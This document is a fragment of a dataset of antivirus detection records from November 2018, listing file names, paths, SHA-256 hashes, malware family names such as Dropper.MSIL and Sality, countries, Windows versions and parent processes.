  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\apehnkswsbb\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:05:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\5vvvl1ffmnl\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:49:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\ezhambmzzi3\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:17:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\1mpf5ui21k2\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1541017899.5bda112b7865d', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Backs\\362838467.exe', parentsize=671232, timestamp='2018-11-01T08:21:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\3mnufzljt0n\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:00:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\ixlatxi1udo\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1539843432.5bc825683a740', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AZ\\499287.exe', parentsize=671232, timestamp='2018-11-01T10:13:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\4mui3oqb02y\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1540912029.5bd8739d3b7a5', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Emtak\\214531731.exe', parentsize=670720, timestamp='2018-11-01T00:21:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\0kpajx5iazx\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1540912029.5bd8739d3b7a5', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Emtak\\214531731.exe', parentsize=670720, timestamp='2018-11-01T08:22:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\pxqyzl0r0v5\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:41:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\o5z1vhgkgzt\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1541012649.5bd9fca932ce3', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Backs\\636713205.exe', parentsize=671232, timestamp='2018-11-01T12:05:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\04boqfvo3qe\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:30:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\f3a1auwacbd\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:18:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\ipqhxcz05id\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1540431164.5bd11d3ca04a7', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Capture\\59416348.exe', parentsize=670720, timestamp='2018-11-01T00:13:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\lfpeuoawwn5\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1539843432.5bc825683a740', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AZ\\499287.exe', parentsize=671232, timestamp='2018-11-01T07:31:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\1uogrpi3pgs\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1541047614.5bda853e876ec', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Backs\\701317936.exe', parentsize=671232, timestamp='2018-11-01T12:34:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\zjeemt5fuic\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='HU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T14:54:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\2tddajhl40f\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:32:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\yw15pqe22be\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1540457318.5bd1836688dae', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Capture\\169492924.exe', parentsize=670720, timestamp='2018-11-01T02:22:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\1\\3dechevqmfn\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1540935543.5bd8cf77df06c', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\Emtak\\311682672.exe', parentsize=670720, timestamp='2018-11-01T11:55:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\2tddajhl40f\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:32:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\viykmlrd5gz\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:16:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\04boqfvo3qe\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:30:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\wymz3e23ops\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:18:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\Hasani\\AppData\\Local\\Temp\\dtzk5w2zw3n\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M2.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:16:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\Hasani\\AppData\\Local\\Temp\\dtzk5w2zw3n\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M2.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:16:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\xs3csegs0jo\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:41:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\gm3ltoksmkj\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='LA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:15:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\borym2fzfn2\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='\\\\\\/monitor', country='BE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=18630056, timestamp='2018-11-01T10:35:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='H:\\Users\\X\\AppData\\Local\\Temp\\l4eirefearc\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='AE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2868224, timestamp='2018-11-01T04:49:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\labjh45l5ul\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T08:16:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\3lrcnbaarvu\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1541084365.5bdb14cd504a1', country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Free\\673721701.exe', parentsize=671232, timestamp='2018-11-01T15:00:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\dycbsj4m1vp\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1540954542.5bd919ae2e13d', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Emtak\\68053478.exe', parentsize=670720, timestamp='2018-11-01T06:22:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\1h0xprhnnfz\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:50:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\yblzibmkdbd\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='\\\\\\/monitor', country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=18334528, timestamp='2018-11-01T05:46:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\lbxriq04r2m\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T04:03:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\s14byb0yi02\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1540912029.5bd8739d3b7a5', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Emtak\\214531731.exe', parentsize=670720, timestamp='2018-11-01T10:22:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\05tsmva4wib\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T04:53:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\ilchxgjadly\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:45:27Z'), dt=datetime.date(2018, 11, 1)),
  ...],
 [Row(detection=Row(filename='dup2patcher.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\dup2patcher.dll', filesize=384000, name='SPR/Hacktool.002b10.#M1.#R1'), hash='002b106a99023edc62a5bd957b6276646a15a36c45cf1aa798f74aceb4f9c504', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Desktop\\fab\\Patch\\Patch.exe', parentsize=390656, timestamp='2018-11-04T08:37:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215658-1047abf1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d850e129\\AVSCAN-20181104-215537-07D40A22\\AVSCAN-20181104-215658-1047ABF1', filesize=192000, name='TR/Autorun.AI.#M1.#R1'), hash='00f732f908ef1308c666f9d87084b90aa6f7cb6d01adb5008acd1034588e6259', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T13:47:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='04-b216031bc310v7', filepath='F:\\04-B216031BC310\\04-B216031BC310\\04-B216031BC310v7', filesize=192000, name='TR/Autorun.AI.#M1.#R1'), hash='00f732f908ef1308c666f9d87084b90aa6f7cb6d01adb5008acd1034588e6259', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Program Files (x86)\\360\\360Safe\\safemon\\360tray.exe', parentsize=413256, timestamp='2018-11-04T13:45:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='drvsetupx64.exe', filepath='f:\\lenovo s10-3 win7\\s10-3 win7\\digital_camera\\chicony\\uvc_driver\\DrvSetupX64.exe', filesize=512000, name='W64/Infector.Gen8.#M300.#R700956'), hash='0157d7c00239c0d5484cc2caa7ba46fbcbc21becfb9dba7055775550e9205e3a', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T03:29:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215914-935bb6db', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77e93ea4\\AVSCAN-20181104-214501-F9E185C1\\AVSCAN-20181104-215914-935BB6DB', filesize=64000, name='TR/Siggen.64000.12.#M1.#R1'), hash='01bb8e327211e5fff9594e791c0abb322f765b94a3d0400e7eec9dad68e3310e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:59:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-074315-5e901d8f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8277d26c\\AVSCAN-20181104-073910-47933920\\AVSCAN-20181104-074315-5E901D8F', filesize=2048000, name='ADWARE/MultiPlug.Gen4.#M1.#R1'), hash='01be1d0ace10ca603b47b7bed971792068480351b79216479cc1d7b375e1a87d', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:46:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='old.exe', filepath='\\\\?\\D:\\GRAVITY\\Soft\\Bangla\\Bijoy Bayanna 2016\\fscommand\\BijoyTypingTutor\\program files\\Ananda Computers\\Bijoy TypingTutor\\Other\\old.exe', filesize=3584000, name='TR/Patched.Gen.#M300.#R2947'), hash='023b2eb602fac8320d57c749ea05d85d2ba5061006be6c8e42ed25b8e91ebca3', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:52:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered cemec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered cemec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='0268017b9975cb13801f4f2b1abf5421e24188536126b282a96411a6f92f02ae', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:29:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered cemec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered cemec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='0268017b9975cb13801f4f2b1abf5421e24188536126b282a96411a6f92f02ae', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:02:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='supercow.exe', filepath='D:\\New Folder\\mp3\\gameeeeeeeeeeeees\\البقرة 2\\supercow.exe', filesize=1024000, name='W32/Sality.AT.#M1.#R1'), hash='0348256c3faf7a32b504e3324a2400fa7165253f0266e15bf9008a4744922abd', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-04T19:52:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='arles papa juin 2014 .exe', filepath='C:\\Users\\X\\Documents\\Arles papa_031118\\Arles Papa Juin 2014\\Arles Papa Juin 2014 .exe', filesize=512000, name='TR/Patched.Ren.Gen.#M300.#R2969'), hash='036452ed8e9dd37d84f2d04db5df92a1ddce21ed9c1a21eefa84709bebbd5bc5', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T13:02:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='arles papa juin 2014 .exe', filepath='C:\\Users\\X\\Documents\\Arles papa_031118\\Arles Papa Juin 2014\\Arles Papa Juin 2014 .exe', filesize=512000, name='TR/Patched.Ren.Gen.#M300.#R2969'), hash='036452ed8e9dd37d84f2d04db5df92a1ddce21ed9c1a21eefa84709bebbd5bc5', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T09:25:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='arles papa juin 2014 .exe', filepath='C:\\Users\\X\\Documents\\Arles papa_031118\\Arles Papa Juin 2014\\Arles Papa Juin 2014 .exe', filesize=512000, name='TR/Patched.Ren.Gen.#M300.#R2969'), hash='036452ed8e9dd37d84f2d04db5df92a1ddce21ed9c1a21eefa84709bebbd5bc5', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T17:08:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\setup.exe', filesize=676000, name='HEUR/AGEN.1030930.#M1.#R1'), hash='038bc8ffd03a5d58976a1bc096aa46d8079febf9179634e3417943ee3c8476bb', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1866864, timestamp='2018-11-04T11:05:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-190520-ccf6e083', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b343094\\AVSCAN-20181104-190429-C8275BC2\\AVSCAN-20181104-190520-CCF6E083', filesize=676000, name='Adware/CsdiMonetize.gyfvd.#M1.#R1'), hash='038bc8ffd03a5d58976a1bc096aa46d8079febf9179634e3417943ee3c8476bb', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:07:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='uts1.exe', filepath='G:\\Users\\X\\Downloads\\Document\\Algo Laporan\\UTS1.exe', filesize=128000, name='W32/Neshta.A.#M1.#R1'), hash='0390d00a37856c7fd9cdd13b74671ac4088c254759c3d94ffd4540cd7854d4e3', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T16:55:00Z'), dt=datetime.date(2018, 11, 4)),
